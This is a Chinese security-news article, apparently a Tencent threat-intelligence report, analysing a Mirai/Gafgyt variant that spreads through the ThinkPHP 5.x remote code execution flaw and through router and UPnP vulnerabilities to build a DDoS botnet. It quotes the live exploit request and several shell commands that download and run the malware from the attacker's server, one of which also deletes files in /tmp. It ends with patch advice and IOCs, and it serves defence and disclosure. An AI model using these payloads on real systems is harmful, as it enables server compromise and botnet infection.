freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

    Mirai蠕虫病毒变种正在利用12月公告的ThinkPHP高危漏洞(CNVD-2018-24942)...
    2019-01-17 18:07:55
    所属地 广东省

    背景

    近期腾讯御见威胁情报中心监测到某教育科技机构服务器遭到ThinkPHPV5* 远程代码执行漏洞攻击。发起本次攻击的病毒为参考Mirai和Gafgyt源代码的变种病毒,细节上可能与Gafgyt更近一些。 

    ThinkPHP官方在2018.12.09发布安全更新(https://blog.thinkphp.cn/869075),公布了远程命令执行的高危漏洞(CNVD-2018-24942),该漏洞主要因为php代码中route/dispatch模块没有对URL中的恶意命令进行过滤导致,在没有开启强制路由的情况下,能够造成远程命令执行,包括执行shell命令,调用php函数,写入webshell等。主要影响的版本包括 5.x < 5.1.31, 5.x <= 5.0.23。黑客利用上述漏洞,可以批量入侵企业网站。

    1.png

     该科技教育机构的网站服务器采用ThinkPHP版本为5.1.30,属于受影响版本范围。

    2.png

    根据CNVD(国家信息安全漏洞共享平台)探测数据,全球使用ThinkPHP框架的服务器规模共有4.3万;按国家分布情况,位于前三的分别是中国(3.9万)、美国(4187)和加拿大(471)。 

    腾讯御见威胁情报中心已于2018.12.13日对该漏洞发布预警:https://mp.weixin.qq.com/s/vKejiR628Frb_-y9WzTmIQ

    样本分析

    分析发现攻击样本为最新的Mirai病毒变种,看国外相关资料,这类样本参考Mirai和Gafgyt源代码编写,细节上可能与Gafgyt更相近一些。该变种利用最新的ThinkPHP V5*远程代码执行漏洞感染x86服务器,同时利用华为路由器漏洞、友讯路由器漏洞、瑞昱upnp设备漏洞感染物联网设备。

    感染成功后分别从服务器185.244.25.168下载木马x86mips植入。X86mips被植入感染设备后会针对其他机器继续发起扫描攻击,导致该木马具有自传播能力。同时受感染设备接收服务器指令执行DDoS攻击,攻击类型包括HTTPUDPTCP

    3.png

    漏洞攻击

    针对ThinkPHP(CNVD-2018-24942)漏洞攻击时构造如下POC代码,将请求发送至目标服务器:

    GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd/tmp;wget http://185.244.25.168/x86;chmod 777 x86;sh x86 

    漏洞攻击成功后通过wget下载植入木马http://185.244.25.168/x86。

    4.png

    针对友讯路由器漏洞扫描攻击,攻击成功后执行命令:

    cd /tmp && rm -rf * &&wgethttp://185.244.25.168/mips && chmod +x mips;./mips

    5.png

    6.png

    针对华为路由器漏洞扫描攻击,攻击成功后执行命令:

    /bin/busybox wget -g 185.244.25.168 -l /tmp/mips -r/mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei

    7.png


    8.png

    针对瑞昱upnp设备漏洞扫描攻击,攻击成功后执行命令:

    cd /var/; wget http://185.244.25.168/mips; chmod +x mips;./mips

    9.png


    10.png

    DDoS攻击

    初始化连接服务器185.244.25.168:52

    11.png

    发起DDoS时具有包括HTTP TCPUDP 等协议的攻击类型。攻击的选项有多种,例如目标 IP、是否分片、每次发送的长度、是否发送随机数据等。

    HTTP攻击:

    12.png

    UDP攻击:

    13.png

    TCP攻击:

    14.png

    Mirai病毒在2016年开始出现,通过感染可访问网络的消费级电子设备例如网络监控摄像机和家庭路由器等,以达到组建僵尸网络进行大规模网络攻击的目的

    Mirai构建的僵尸网络已经参与了几次影响广泛的大型分布式拒绝服务攻击(DDoS攻击),包括2016920日针对计算机安全撰稿人布莱恩·克莱布斯个人网站的攻击、对法国网站托管商OVH的攻击,以及201610Dyn公司网络攻击事件。 

    如今开发Mirai病毒的作者已经落网,但是Mirai的源代码以开源的形式发布至黑客论坛,其中的技术也已被其他一些恶意软件采用,导致其危害仍在延续。 

    2018.12.28日腾讯御见威胁情报中心发现利用SQL Server弱密码进行暴力入侵的病毒攻击事件,被入侵的服务器被安装暗云感染器、Mykings木马、以及Mirai病毒变种,该Mirai变种具有针对闭路电视物联网设备漏洞进行攻击的能力。此次发现的变种将最新ThinkPHP高危漏洞、多种路由器漏洞、upnp设备漏洞进行组合攻击,感染能力再次增强。

    安全建议:

    1、尽快更新ThinkPHP到最新版本,手动修复可参考官方说明

    https://blog.thinkphp.cn/869075 

    2、可使用腾讯御界高级威胁检测系统检测该ThinkPHP漏洞,同时可以检测利用该漏洞入侵攻击。

    15.png

    IOCs

    IP

    185.244.25.168 

    URL

    hxxp://185.244.25.168/x86

    hxxp://185.244.25.168/mips 

    md5

    9439173a2353d9dda2da5d75e953b56f

    fac15f7d9426c0e80f64cf4663d5292e 

    参考链接:

    https://blog.thinkphp.cn/869075

    https://mp.weixin.qq.com/s/vKejiR628Frb_-y9WzTmIQ

    https://mp.weixin.qq.com/s/wuWKQnxQBvSvkqpK3KaE2Q

    # ThinkPHP # 远程代码执行漏洞 # Mirai变种 # 腾讯御见威胁情报 # Gafgyt变种
    本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
    被以下专辑收录,发现更多精彩内容
    + 收入我的专辑
    + 加入我的收藏
    相关推荐
    • 0 文章数
    • 0 关注者